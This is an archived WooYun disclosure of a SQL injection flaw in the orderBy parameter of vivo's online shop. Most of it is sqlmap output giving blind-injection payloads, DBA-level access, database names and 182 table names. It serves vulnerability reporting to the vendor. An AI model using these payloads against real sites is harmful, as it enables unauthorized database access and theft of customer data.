乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-29: 细节已通知厂商并且等待厂商处理中 2015-08-02: 厂商已经确认,细节仅向厂商公开 2015-08-12: 细节向核心白帽子及相关领域专家公开 2015-08-22: 细节向普通白帽子公开 2015-09-01: 细节向实习白帽子公开 2015-09-16: 细节向公众公开
RT
http://shop.vivo.com.cn/gallery-ajax_get_goods.htmlpost参数:cat_id=&orderBy=*&scontent=n,e&showtype=grid&&virtual_cat_id=orderBy参数存在注入
sqlmap identified the following injection points with a total of 522 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id= Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id= Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))---web application technology: Nginx, PHP 5.3.25back-end DBMS: MySQL 5.0current user: '[email protected].%'current database: 'vivo_store'current user is DBA: Trueavailable databases [8]:[*] cacti[*] information_schema[*] mysql[*] performance_schema[*] seckill[*] test[*] vivo04e9[*] vivo_chksqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: cat_id=&orderBy=(SELECT (CASE WHEN (2977=2977) THEN 2977 ELSE 2977*(SELECT 2977 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id= Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: cat_id=&orderBy=(SELECT (CASE WHEN (3089=3089) THEN SLEEP(5) ELSE 3089*(SELECT 3089 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&scontent=n,e&showtype=grid&&virtual_cat_id= Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))---web application technology: Nginx, PHP 5.3.25back-end DBMS: MySQL 5.0Database: vivo_store[182 tables]+-----------------------------------------+| sdb_aftersales_return_product || sdb_apiactionlog_apilog || sdb_b2c_archive_orders || sdb_b2c_brand || sdb_b2c_cart || sdb_b2c_cart_objects || sdb_b2c_college || sdb_b2c_comment_goods_point || sdb_b2c_comment_goods_type || sdb_b2c_contract_package || sdb_b2c_contract_package_numbers || sdb_b2c_counter || sdb_b2c_counter_attach || sdb_b2c_coupon_map || sdb_b2c_coupon_vivo || sdb_b2c_coupon_vivo_info || sdb_b2c_coupon_vivo_list || sdb_b2c_coupon_vivo_xshot || sdb_b2c_coupons || sdb_b2c_delivery || sdb_b2c_delivery_items || sdb_b2c_dly_h_area || sdb_b2c_dlycorp || sdb_b2c_dlytype || sdb_b2c_flashlottery_award || sdb_b2c_flashlottery_log || sdb_b2c_flashlottery_winner || sdb_b2c_goods || sdb_b2c_goods_cat || sdb_b2c_goods_contract_package || sdb_b2c_goods_keywords || sdb_b2c_goods_lv_price || sdb_b2c_goods_promotion_ref || sdb_b2c_goods_question || sdb_b2c_goods_rate || sdb_b2c_goods_spec_index || sdb_b2c_goods_store_prompt || sdb_b2c_goods_type || sdb_b2c_goods_type_props || sdb_b2c_goods_type_props_value || sdb_b2c_goods_type_spec || sdb_b2c_goods_virtual_cat || sdb_b2c_lottery_award || sdb_b2c_lottery_log || sdb_b2c_lottery_winner || sdb_b2c_member_addrs || sdb_b2c_member_advance || sdb_b2c_member_college || sdb_b2c_member_comments || sdb_b2c_member_coupon || sdb_b2c_member_goods || sdb_b2c_member_limit_ip || sdb_b2c_member_lv || sdb_b2c_member_msg || sdb_b2c_member_point || sdb_b2c_member_pwdlog || sdb_b2c_member_secret || sdb_b2c_member_share_history || sdb_b2c_member_systmpl || sdb_b2c_members || sdb_b2c_order_coupon_user || sdb_b2c_order_delivery || sdb_b2c_order_items || sdb_b2c_order_log || sdb_b2c_order_objects || sdb_b2c_order_pmt || sdb_b2c_orders || sdb_b2c_preorders_sales_rule || sdb_b2c_products || sdb_b2c_reship || sdb_b2c_reship_items || sdb_b2c_sales_rule_goods || sdb_b2c_sales_rule_order || sdb_b2c_sell_logs || sdb_b2c_shop || sdb_b2c_spec_values || sdb_b2c_specification || sdb_b2c_type_brand || sdb_b2c_xfive_coupon_log || sdb_b2c_xfiveblue_preorder || sdb_b2c_xfivepro_preorder || sdb_base_app_content || sdb_base_apps || sdb_base_cache_expires || sdb_base_crontab || sdb_base_files || sdb_base_kvstore || sdb_base_network || sdb_base_queue || sdb_base_rpcnotify || sdb_base_rpcpoll || sdb_base_syscache_resources || sdb_content_article_bodys || sdb_content_article_indexs || sdb_content_article_nodes || sdb_couponlog_order_coupon_ref || sdb_couponlog_order_coupon_user || sdb_dbeav_meta_register || sdb_dbeav_meta_value_datetime || sdb_dbeav_meta_value_decimal || sdb_dbeav_meta_value_int || sdb_dbeav_meta_value_longtext || sdb_dbeav_meta_value_text || sdb_dbeav_meta_value_varchar || sdb_dbeav_recycle || sdb_desktop_filter || sdb_desktop_flow || sdb_desktop_hasrole || sdb_desktop_menus || sdb_desktop_recycle || sdb_desktop_role_flow || sdb_desktop_roles || sdb_desktop_tag || sdb_desktop_tag_rel || sdb_desktop_user_flow || sdb_desktop_users || sdb_ectools_analysis || sdb_ectools_analysis_logs || sdb_ectools_currency || sdb_ectools_order_bills || sdb_ectools_payments || sdb_ectools_payments_log_callback || sdb_ectools_payments_log_request || sdb_ectools_refunds || sdb_ectools_regions || sdb_express_dly_center || sdb_express_print_tmpl || sdb_gift_cat || sdb_gift_ref || sdb_image_image || sdb_image_image_attach || sdb_importexport_task || sdb_logisticstrack_logistic_log || sdb_operatorlog_logs || sdb_operatorlog_normallogs || sdb_operatorlog_register || sdb_pam_account || sdb_pam_auth || sdb_pam_bind_tag || sdb_pam_log || sdb_pointprofessional_member_point_task || sdb_preorderlog_order_preorder_user || sdb_site_activities_survey || sdb_site_activities_xfivepro || sdb_site_explorers || sdb_site_index_page || sdb_site_link || sdb_site_lucky_draw || sdb_site_menus || sdb_site_modules || sdb_site_purchase || sdb_site_route_statics || sdb_site_seo || sdb_site_themes || sdb_site_themes_file || sdb_site_themes_tmpl || sdb_site_widgets || sdb_site_widgets_instance || sdb_site_widgets_proinstance || sdb_system_matrixset || sdb_system_queue_mysql || sdb_timedbuy_objitems || sdb_upimage_upimage || sdb_wap_explorers || sdb_wap_menus || sdb_wap_modules || sdb_wap_seo || sdb_wap_themes || sdb_wap_themes_file || sdb_wap_themes_tmpl || sdb_wap_widgets || sdb_wap_widgets_instance || sdb_weixin_alert || sdb_weixin_bind || sdb_weixin_menus || sdb_weixin_message || sdb_weixin_message_image || sdb_weixin_message_text || sdb_weixin_safeguard || tmp_53aa3e378d690 || tmp_53bbb6d760ad5 || tmp_53bbc08212460 |+-----------------------------------------+
参数过滤
危害等级:高
漏洞Rank:20
确认时间:2015-08-02 11:33
感谢关注
暂无
